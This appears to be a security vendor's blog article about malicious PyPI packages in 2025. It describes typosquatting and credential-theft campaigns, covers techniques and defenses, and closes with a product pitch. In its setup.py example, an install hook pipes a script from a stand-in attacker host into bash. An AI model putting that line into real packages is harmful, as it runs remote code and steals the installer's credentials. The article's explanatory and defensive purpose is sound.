Supply Chain Security

PyPI Malicious Packages 2025: Python's Growing Supply Chain Problem

PyPI faced a surge of malicious package uploads in early 2025, targeting data science, AI/ML, and cloud development workflows. Here's the full picture.

The Python Package Index (PyPI) — the primary repository for Python packages with over 500,000 projects — saw a significant escalation in malicious package campaigns through early 2025. Security researchers from multiple firms identified coordinated upload campaigns targeting Python developers working in data science, machine learning, cloud infrastructure, and cryptocurrency development.

Python's dominance in AI/ML development has made PyPI an increasingly attractive target. When every data scientist and ML engineer runs pip install dozens of times a day, the probability of someone installing a malicious package through typosquatting or social engineering grows proportionally.

Scale of the Problem

In the first quarter of 2025:

Over 500 malicious packages were identified and removed from PyPI
Multiple coordinated campaigns targeted specific developer communities
AI/ML-themed packages accounted for approximately 30% of malicious uploads
Credential theft remained the primary payload objective
Cloud infrastructure targeting increased significantly, with packages designed to steal AWS, GCP, and Azure credentials

PyPI's volunteer-staffed moderation team, supported by automated scanning, removed packages as quickly as they were identified. But the time between upload and removal — the exposure window — ranged from hours to days, during which vulnerable developers could download and install the malicious code.

Attack Campaigns

AI/ML typosquatting wave

The explosive growth of Python AI/ML libraries created fertile ground for typosquatting. Packages mimicking popular libraries were uploaded with names like:

Variants of transformers, pytorch, tensorflow, and scikit-learn
Fake "helper" or "utils" packages for popular AI frameworks
Packages claiming to provide GPU optimization or model quantization utilities

These targeted a developer demographic that often works in environments with elevated privileges — accessing training data, cloud compute resources, and model repositories. The payloads focused on stealing:

Hugging Face API tokens
Cloud provider credentials
SSH keys used for cluster access
Weights & Biases and MLflow credentials

Cloud development targeting

Packages designed to intercept cloud infrastructure credentials:

Typosquats of boto3 (AWS SDK), google-cloud-* packages, and azure-* packages
Fake infrastructure-as-code helper libraries
Packages impersonating internal tooling names discovered through GitHub reconnaissance

The payloads exfiltrated credentials and in some cases deployed persistent backdoors that survived beyond the initial Python session.

Cryptocurrency library impersonation

Fake packages targeting cryptocurrency developers:

Wallet library impersonations that intercepted private keys
Exchange API wrappers that modified transaction recipients
DeFi development tools that included key-logging functionality

Given that cryptocurrency transactions are irreversible, these attacks had immediate, unrecoverable financial impact on victims.

Technical Techniques

setup.py exploitation

Python's setup.py runs arbitrary code during package installation. Malicious packages use this to execute payloads before the developer even imports the package:

from setuptools import setup
import os
os.system("curl -s https://attacker.com/payload.sh | bash")
setup(name="legitimate-looking-name", ...)

The code runs with the installer's permissions, which in many development environments includes access to cloud credentials, SSH keys, and CI/CD secrets.

Conditional execution

Sophisticated packages check their environment before executing payloads:

Detecting CI/CD environments (checking for CI, GITHUB_ACTIONS, JENKINS_URL variables)
Targeting specific operating systems
Checking for the presence of specific tools or files that indicate high-value targets
Delaying execution to evade sandbox analysis

Steganographic payloads

Some packages embedded malicious code within seemingly legitimate data files — images, model weights, or configuration files included in the package. The setup script would extract and execute the hidden payload, bypassing static analysis that only examines Python source files.

Dependency chain poisoning

Rather than making the malicious package itself suspicious, some campaigns created chains of packages where:

Package A appears clean and provides useful functionality
Package A depends on Package B, which also appears clean
Package B depends on Package C, which contains the malicious payload

This multi-layer approach makes detection harder because each individual package may not trigger security alerts.

PyPI's Defensive Evolution

PyPI has implemented several security improvements:

Mandatory 2FA for critical project maintainers
Trusted Publishers using OpenID Connect for automated publishing from CI/CD
Malware detection scanning using pattern matching and behavioral analysis
Rate limiting on new package registrations
Package provenance through Sigstore integration

These measures have raised the bar for attackers but haven't eliminated the problem. The fundamental challenge is that PyPI is a public repository that accepts uploads from anyone, and the volume of legitimate uploads makes manual review impossible.

Defensive Strategies for Python Developers

Virtual environments always

Never install packages into your system Python. Use virtual environments (venv, conda, poetry) for every project. This limits the blast radius of a malicious package to the project environment rather than your entire system.

Pin dependencies and use hash verification

Use pip install --require-hashes with pinned versions in your requirements files. This ensures that the exact package contents you've reviewed are what gets installed.

requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003eb

Audit new dependencies

Before adding a new dependency:

Check the package's age, download count, and maintainer history
Review the source code, especially setup.py and __init__.py
Check for install-time execution hooks
Verify the package on PyPI matches what's on GitHub

Use dependency scanning tools

Integrate automated dependency scanning into your development workflow:

PyPI advisory database checks
Commercial tools (Snyk, Socket.dev, Phylum)
Open source options (pip-audit, safety)
SBOM generation for all Python projects

Private package index

For organizations with internal packages, use a private package index (Artifactory, Nexus, devpi) configured as the primary source. This prevents dependency confusion attacks and allows pre-screening of external packages.

How Safeguard.sh Helps

Safeguard.sh provides comprehensive Python supply chain security through automated SBOM generation and continuous dependency monitoring. The platform tracks every Python package in your projects — direct dependencies and the full transitive tree — and correlates them against known vulnerability databases and malicious package feeds.

When a new malicious PyPI package is identified, Safeguard.sh immediately checks your entire organization's Python dependency trees for exposure. This is critical for large organizations with hundreds of Python projects where manual auditing is impossible.

The platform's policy engine can enforce Python-specific security standards: requiring hash verification, flagging packages with install-time scripts, alerting on new dependencies, and blocking packages that match known malicious patterns. For AI/ML teams working with rapidly evolving dependency stacks, Safeguard.sh provides the automated oversight that prevents supply chain compromises from reaching production.

PyPI Python Supply Chain Attack Malware Package Security

Back to all articles

More on #PyPI

View all →

Open Source Security

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.

PyPI Malicious Packages 2025: Python's Growing Supply Chain Problem

Scale of the Problem

Attack Campaigns

AI/ML typosquatting wave

Cloud development targeting

Cryptocurrency library impersonation

Technical Techniques

setup.py exploitation

Conditional execution

Steganographic payloads

Dependency chain poisoning

PyPI's Defensive Evolution

Defensive Strategies for Python Developers

Virtual environments always

Pin dependencies and use hash verification

Audit new dependencies

Use dependency scanning tools

Private package index

How Safeguard.sh Helps

More on #PyPI

PyPI Attestation Requirements: A Roadmap Read

PyPI Organization Accounts: The Security Model

PyPI Download Statistics as a Security Signal

SLSA Build Provenance for Python Publish

Related articles in Supply Chain Security

npm Supply Chain Attacks Q1 2025: Dependency Confusion, Typosquatting, and Maintainer Takeovers

GitHub Actions Supply Chain Attack: The tj-actions/changed-files Compromise

Python Package Typosquatting in 2024: Scale, Tactics, and Defenses

Never miss an update

Product

Solutions

Compare

Resources

Company

Legal

Developers